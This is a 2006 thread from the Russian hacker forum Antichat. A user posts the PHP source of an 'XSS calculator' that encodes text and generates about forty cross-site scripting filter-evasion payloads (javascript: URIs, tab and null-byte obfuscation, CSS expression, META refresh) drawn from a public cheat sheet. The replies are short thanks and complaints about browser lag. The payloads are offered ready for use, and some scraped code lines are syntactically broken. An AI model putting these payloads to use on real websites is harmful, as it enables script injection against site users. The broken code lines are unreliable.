ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Small XSS calculator
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Small XSS calculator
  #1  
Старый 26.11.2006, 18:19
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию Small XSS calculator
Очередная маленькая утилита.На этот раз всего лишь кодирует ascii текст в различные формы,этакий xss калькулятор.

База xss уязвимостей была взята у ha.ckers.org ( XSS (Cross Site Scripting) Cheat Sheet by RSnake).

Скрипт использует AJAX - технологии,то есть для работоспособности java-script должен быть включен.В ie почему-то отображается не весь текст.

http://underwater.cup.su/xss/
 
Ответить с цитированием

  #2  
Старый 27.11.2006, 01:03
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию
Тем кому интересно вот исходник и база уязвимостей

PHP код:
function asciitohex($str
 {
  for ($i=0;$i<strlen($str);$i++)
  { 
   $mystr .= '%'.bin2hex($str[$i]);
  }
  return $mystr;
 }

 function entityenc($str
 {
  for ($i=0;$i<strlen($str);$i++)
  { 
   $mystr .= "&#" ord($str[$i]);
  }
  return $mystr;
 }
 
 function asciitodec($str
 {
  for ($i=0;$i<strlen($str);$i++)
  { 
   $mystr .= ord($str[$i]).",";
  }
   $mystr substr($mystr,0,strlen($mystr)-1);
   return $mystr;
 }
 
 function asciitobase($str)
 {
  return base64_encode($str);
 } 
PHP код:
echo ('alert(String.fromCharCode('.asciitodec($_POST['text']).'))');
echo ("'';!--".chr(34)."<XSS>=&{()}");
echo ("<IMG SRC=".chr(34)."javascript:alert('".$_POST['text']."');".chr(34).">");
echo ("<IMG SRC=javascript:alert('".$_POST['text']."')>");
echo ("<IMG SRC=JaVaScRiPt:alert('".$_POST['text']."')>");
echo ("<IMG SRC=javascript:alert(".htmlspecialchars($_POST['text'],ENT_QUOTES).")>");
echo ('<IMG """><SCRIPT>alert("'.$_POST['text'].'")</SCRIPT>">');
echo ('<IMG SRC=javascript:alert(String.fromCharCode('.asciitodec($_POST['text']).'))>');
echo ('<IMG SRC="jav    ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ('<IMG SRC="jav&#x09;ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ('<IMG SRC="jav&#x0A;ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ('<IMG SRC="jav&#x0D;ascript:alert('.chr(39).$_POST['text'].chr(39).');"');
echo ("perl -e 'print ".chr(34)."<IMG SRC=java\0script:alert(".chr(34).$_POST['text'].chr(34).")>".chr(34).";' > out");
echo ("perl -e 'print ".chr(34)."<SCR\0IPT>alert(".chr(34).$_POST['text'].chr(34).")</SCR\0IPT>".chr(34).";' > out");
echo ("<IMG SRC=".chr(34)."   javascript:alert('".$_POST['text']."');".chr(34).">");
echo ("<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(".chr(34).$_POST['text'].chr(34).")>");
echo ('<<SCRIPT>alert("'.$_POST['text'].'");//<</SCRIPT>');
echo ('<IMG SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).')"');
echo ('<SCRIPT>a=/'.chr(39).$_POST['text'].chr(39).'/alert(a.source)</SCRIPT>');
echo ('\";alert('.chr(39).$_POST['text'].chr(39).');//');
echo ('</TITLE><SCRIPT>alert("'.$_POST['text'].'");</SCRIPT>');
echo ('<INPUT TYPE="IMAGE" SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<BODY BACKGROUND="javascript:alert('.chr(39).$_POST['text'].chr(39).')">');
echo ("<BODY ONLOAD=alert('".$_POST['text']."')>");
echo ('<IMG DYNSRC="javascript:alert('.chr(39).$_POST['text'].chr(39).')">);');
echo ('<IMG LOWSRC="javascript:alert('.chr(39).$_POST['text'].chr(39).')">);');
echo ('<BGSOUND SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<BR SIZE="&{alert('.chr(39).$_POST['text'].chr(39).')}">');
echo ('<LINK REL="stylesheet" HREF="javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<STYLE>li {list-style-image: url("javascript:alert('.chr(39).$_POST['text'].chr(39).')");}</STYLE><UL><LI>'.$_POST['text']);
echo ("<IMG SRC='vbscript:msgbox(".chr(34).$_POST['text'].chr(34).")'>");
echo ('<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('.chr(39).$_POST['text'].chr(39).');">');
echo ('<IFRAME SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');"></IFRAME>');
echo ('<FRAMESET><FRAME SRC="javascript:alert('.chr(39).$_POST['text'].chr(39).');"></FRAMESET>');
echo ('<TABLE BACKGROUND="javascript:alert('.chr(39).$_POST['text'].chr(39).')">');
echo ('<TABLE><TD BACKGROUND="javascript:alert('.chr(39).$_POST['text'].chr(39).')">');
echo ('<DIV STYLE="background-image: url(javascript:alert('.chr(39).$_POST['text'].chr(39).'))">');
echo ('<DIV STYLE="width: expression(alert('.chr(39).$_POST['text'].chr(39).'));">');
echo ("<STYLE>@im\port'\ja\vasc\ript:alert(".chr(34).$_POST['text'].chr(34).")';</STYLE>");
echo ('<XSS STYLE="xss:expression(alert('.chr(39).$_POST['text'].chr(39).'))">');
echo ('<STYLE TYPE="text/javascript">alert('.chr(39).$_POST['text'].chr(39).');</STYLE>');
echo ('<STYLE>.XSS{background-image:url("javascript:alert('.chr(39).$_POST['text'].chr(39).')");}</STYLE><A CLASS=XSS></A>');
echo ('<BASE HREF="javascript:alert('.chr(39).$_POST['text'].chr(39).');//">');
echo ('<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('.chr(39).$_POST['text'].chr(39).')&lt;/SCRIPT&gt;">');
 echo("<br/><b><center>Used XSS (Cross Site Scripting) Cheat Sheet at ha.ckers.org</b></center>"); 
 
Ответить с цитированием

  #3  
Старый 28.11.2006, 18:20
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию
У меня файрфокс завис((((((((((((((((((((((((((((((((
 
Ответить с цитированием

  #4  
Старый 28.11.2006, 18:22
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию
ЫЫыы так тебе и надо %)
 
Ответить с цитированием

  #5  
Старый 28.11.2006, 18:25
Аватар для Gh0s7
Gh0s7
Участник форума
Регистрация: 23.11.2006
Сообщений: 226
Провел на форуме:
1045663

Репутация: 864
По умолчанию
Гема, полезная весч, спасибо.
P.s.А у меня фф все быстро отработал)
 
Ответить с цитированием

  #6  
Старый 28.11.2006, 18:27
Аватар для EPIDEM
EPIDEM
Banned
Регистрация: 28.12.2005
Сообщений: 221
Провел на форуме:
2540519

Репутация: 60
Отправить сообщение для EPIDEM с помощью ICQ
По умолчанию
Мля, в фф лаги.... =/
 
Ответить с цитированием

  #7  
Старый 06.12.2006, 01:46
Аватар для jonart
jonart
Познающий
Регистрация: 06.04.2005
Сообщений: 53
Провел на форуме:
72540

Репутация: 19
Отправить сообщение для jonart с помощью ICQ
По умолчанию
gemaglabin молодца респект!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
IE XSS Kit .Slip Чаты 22 23.10.2006 06:45
XSS worms Xex Статьи 0 02.10.2006 01:49
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ